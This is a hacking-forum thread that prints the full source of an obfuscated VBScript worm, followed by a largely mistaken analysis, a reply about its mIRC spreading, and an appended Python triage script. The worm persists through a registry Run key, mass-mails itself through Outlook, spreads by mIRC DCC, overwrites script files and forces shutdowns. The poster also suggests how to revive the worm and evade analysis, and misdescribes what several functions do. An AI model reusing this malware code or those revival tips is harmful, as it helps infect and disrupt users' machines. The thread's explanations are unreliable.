Analyzing a vbs Worm
  • m0rph
    Posts: 332
    #############################################################
    #
    # This is what I like to call the \"head\" of the worm
    #
    #############################################################

    Set O6734VC6 = createobject("scripting.filesystemobject")
    O78SS2L7 = O6734VC6.getspecialfolder(1)
    A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"
    Set E828D4O2 = createobject("wscript.shell")
    E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & A6G1HQFH & " %"
    O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
    UB51PCQU
    If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then
    KD8F5L2N
    End if
    If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then
    HLVO1EDH ""
    End if

    #############################################################
    #
    # The next part I like to refer to as the \"body\"
    #
    #############################################################
    Function KD8F5L2N()
    Set O13Q767K = CreateObject("Outlook.Application")
    If O13Q767K = "Outlook" Then
    Set LFSIH230 = O13Q767K.GetNameSpace("MAPI")
    Set LLLK4LPL = LFSIH230.AddressLists
    For Each A4A83865 In LLLK4LPL
    If A4A83865.AddressEntries.Count <> 0 Then
    JM1R7N44 = A4A83865.AddressEntries.Count
    For NHF463JD = 1 To JM1R7N44
    Set OU435GC5 = O13Q767K.CreateItem(0)
    Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
    OU435GC5.To = KP511I06.Address
    OU435GC5.Subject = "Very Important!"
    OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
    execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
    IJ15SDEE = A6G1HQFH
    OU435GC5.DeleteAfterSubmit = True
    DH97CAIN.Add IJ15SDEE
    If OU435GC5.To <> \"\" Then
    OU435GC5.Send
    End If
    Next
    End If
    Next
    End If
    End function
    Function HLVO1EDH(AHAOA819)
    If AHAOA819 <> \"\" Then
    TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
    If O6734VC6.fileexists("c:\mirc\mirc.ini") Then
    AHAOA819 = "c:\mirc\"
    ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then
    AHAOA819 = "c:\mirc32\"
    ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then
    AHAOA819 = TJTE98P3 & "\mirc\"
    ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then
    AHAOA819 = TJTE98P3 & "\mirc\"
    Else
    AHAOA819 = ""
    End If
    End If
    If AHAOA819 <> "" Then
    Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "script.ini", True)
    U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
    U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{"
    U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
    U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
    U127MJ5H = U127MJ5H & A6G1HQFH
    U127MJ5H = U127MJ5H & vbCrLf & "n3=}"
    script.Close
    End If
    End Function
    Function J706734V()
    On Error Resume Next
    Set CKQ24CHB = O6734VC6.Drives
    For Each G2U828D4 In CKQ24CHB
    OC078SS2 = G2U828D4 & \" \"
    Call L7R6G1HQ(OC078SS2)
    Next
    End Function

    Function L7R6G1HQ(FS6B51PC)
    Q35A1OM5 = FS6B51PC
    Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
    Set G6F47AC8 = ITHD8F5L.Files
    For Each NFFLVO1E In G6F47AC8
    If lcase(NFFLVO1E.Name) = \"mirc.ini\" Then
    HLVO1EDH(NFFLVO1E.ParentFolder)
    End If
    If O6734VC6.GetExtensionName(NFFLVO1E.path) = \"vbs\"
    O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
    End if
    If O6734VC6.GetExtensionName(NFFLVO1E.path) = \"vbe\"
    O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
    End if
    Next
    Set VSM3BL08 = ITHD8F5L.Subfolders
    For Each UQFA0DCQ In VSM3BL08
    Call (UQFA0DCQ.path)
    Next
    End function


    #############################################################
    #
    # and finally the \"tail\" so to speak.
    #
    #############################################################


    Function UB51PCQU()
    Randomize
    If 1 + Int(Rnd * 50) = 7 then
    E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"
    end if
    end function

    ####################### End of Code #########################

    In the head of the worm, it first writes itself to the Windows Update directory as a value for "wscript.exe" from the registry for
    all accounts on the machine, as seen by the root directory of "HKLM" or HKEY_LOCAL_MACHINE, and proceeds to read values from
    "fingeren.avi" to execute other functions within itself. This results in the worm being executed every time Windows Update is initiated.

    In the body of the worm, it targets the Microsoft Outlook application as a form of propagating itself.
    It first registers Microsoft Outlook as an extension to the worm itself by reading all of the contacts within one's address list. It
    then enumerates the addresses in numerical order, creating an email to attach itself to. Once all of the emails it created have been
    sent out, it deletes them from Microsoft Outlook, so when the user logs in, he or she doesn't see any suspicious info.

    The next function in the body looks for a file called "mirc.ini". From what we as hackers know about malicious software, we can only assume it
    is referring to an Internet Relay Chat server as described within. After it reads the assumed IRC server within the mirc.ini script, it connects to
    it under a random nickname where the owner of this worm can send commands to it. We can assume the commands defined by this worm are written in
    a file called "script.ini", seeing as this function listens for commands under a variable defined as "script".

    The next function appears to mount drives and folders on the local system. I'm not entirely positive, but it looks to me as if the next
    function attempts to create copies of the "mirc.ini" file, which I would think would give it more options to connect to the IRC server
    in the event of one of the "mirc.ini" files being deleted. It then appears to me that it copies the worm itself to all folders associated
    with a "mirc.ini" file.

    In the footer, I'm once again assuming that the code attempts to read the registry entries it made under the current user logged in. But once
    again, this may not be correct.

    My thoughts:
    I don't know for sure, but I think this is a variant of the "ILOVEYOU" virus. In its current state it doesn't work, because there's no function
    to create the "mirc.ini" file. There's also no function that either creates or defines within itself the commands that are to be found in
    "script.exe" for its communication with an IRC server. Also, "user.exe" was discontinued from the cab file directory after Windows 2000.
    So not only will this not work, but it's also outdated.

    On a side note:
    VBScript is still supported in Windows 7, so if this code were completed by someone who knew how to write VBS very well, and
    rewritten in the last couple of statements so it ran itself under the current user's privileges as described in newer versions
    of the Windows operating system, this worm could work. But one would also have to worry about reverse engineering tactics employed
    against this. Maybe the use of an encryption algorithm for protecting connection information being sent to the IRC server would suffice?

    This uses old school tactics, the kind of stuff the hardcore elite in the generation of hackers before ours used, back when direct
    attacks were almost null and writing programs like this was the rage. I find this a very interesting set of code, and a great place
    for malicious programmers to draw ideas and inspiration from when creating new projects.

    m0rph
    while( !(succeed = try() ) );
  • Sh3llc0d3
    Posts: 1,910
    WARNING: If you run Avast disable it when viewing this thread.
  • sangf
    Posts: 203
    Interesting read~ I believe the IRC stuff is actually part of the spreader/worm itself: it searches for mirc.ini to find out if the user has the mIRC client installed (in c:\ and %programfiles%), and if so it writes a mIRC script to that directory (I believe script1.ini is loaded by default), which makes the user send a VBS file to every person that joins any channel they are on.


    on 1:JOIN:#:{
    if ( $nick == $me ) { halt }
    .dcc send $nick geilfingeren.jpg.vbs
    }
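As an added example, not code from the thread or from the worm's author: a Python triage script that does statically what m0rph walked through by hand above and what sangf describes for the mIRC part. It folds the Chr() chains back into string literals (which is how the sample hides "Attachments" and "dcc"), matches the deobfuscated text against a small indicator list, and reconstructs the script.ini the sample would write so the on-JOIN DCC autosend can be checked directly. The SAMPLE text is a constructed excerpt modelled on the posted code with the backslashes the forum stripped put back; the indicator names and regexes are the editor's assumptions, not anything from the posts.

```python
"""Static triage of an obfuscated VBScript worm (editor's added example).

SAMPLE is a constructed excerpt in the style of the worm posted in this thread
(same randomized identifiers); the indicator table below is the editor's own
assumption of what is worth flagging, not something taken from the posts.
"""
import re

# Constructed excerpt modelled on the posted worm; not the full sample.
SAMPLE = r'''
Set O6734VC6 = createobject("scripting.filesystemobject")
A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"
Set E828D4O2 = createobject("wscript.shell")
E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & A6G1HQFH & " %"
O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
Set O13Q767K = CreateObject("Outlook.Application")
execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "script.ini", True)
U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
U127MJ5H = U127MJ5H & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
U127MJ5H = U127MJ5H & vbCrLf & "n3=}"
Set CKQ24CHB = O6734VC6.Drives
E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"
'''

CHR_RE = re.compile(r"Chr\((\d+)\)", re.IGNORECASE)
# Two adjacent VBScript string literals joined with & ("" inside a literal is an escaped quote).
JOIN_RE = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')


def fold_chr(line: str) -> str:
    """Replace Chr(N) calls with literals, then merge literal & literal chains.

    This undoes the trick the sample uses to hide "Attachments" and "dcc".
    """
    line = CHR_RE.sub(lambda m: '"%s"' % chr(int(m.group(1))).replace('"', '""'), line)
    while True:
        merged = JOIN_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), line)
        if merged == line:
            return line
        line = merged


# Behaviour indicators (editor's assumed list); checked against the deobfuscated text.
INDICATORS = {
    "run_key_persistence": re.compile(r'regwrite\s+"HK(?:LM|EY_LOCAL_MACHINE|CU|EY_CURRENT_USER)\\[^"]*\\Run\\', re.I),
    "self_copy": re.compile(r"copyfile\s+wscript\.scriptfullname", re.I),
    "outlook_automation": re.compile(r'createobject\("outlook\.application"\)', re.I),
    "mail_attachments": re.compile(r"\.Attachments\b", re.I),  # only visible after fold_chr
    "mirc_script_drop": re.compile(r"createtextfile\([^)]*script\.ini", re.I),
    "irc_dcc_send": re.compile(r"\bdcc send\b", re.I),        # only visible after fold_chr
    "drive_enumeration": re.compile(r"\.Drives\b", re.I),
    "forced_shutdown": re.compile(r"user\.exe,exitwindows", re.I),
}


def triage(script: str) -> dict:
    """Deobfuscate line by line and report which behaviours are present."""
    raw_lines = script.splitlines()
    decoded = [fold_chr(l) for l in raw_lines]
    text = "\n".join(decoded)
    return {
        "hits": {name: bool(rx.search(text)) for name, rx in INDICATORS.items()},
        "revealed": [d for d, r in zip(decoded, raw_lines) if d != r],
        "decoded": text,
    }


def dropped_mirc_script(decoded_text: str) -> list:
    """Reconstruct the script.ini body from the sample's "nN=..." literals."""
    return [m.split("=", 1)[1] for m in re.findall(r'"(n\d+=[^"]*)"', decoded_text)]


def is_join_autosend(script_lines: list) -> bool:
    """True if an on-JOIN handler DCC-sends a file to the joining nick."""
    body = " ".join(script_lines)
    return bool(re.search(r"on\s+\S*:JOIN:", body, re.I) and re.search(r"dcc send \$nick", body, re.I))


if __name__ == "__main__":
    report = triage(SAMPLE)
    for name, hit in report["hits"].items():
        print(f"{name:22s} {'YES' if hit else 'no'}")
    print("\nrevealed by folding Chr() chains:")
    for line in report["revealed"]:
        print("  " + line)
    ini = dropped_mirc_script(report["decoded"])
    print("\nreconstructed script.ini body:", *ini, sep="\n  ")
    print("\non-JOIN autosend:", is_join_autosend(ini))
```

Run it as a plain script and it prints the indicator table, the two lines that only become readable after folding the Chr() chains (the Outlook Attachments reference and the "/.dcc send $nick" line), and the reconstructed mIRC handler. The fold step is the one that matters: without it, a grep for "Attachments" or "dcc" over the raw sample finds nothing, which is exactly why the worm spells those words out one character code at a time.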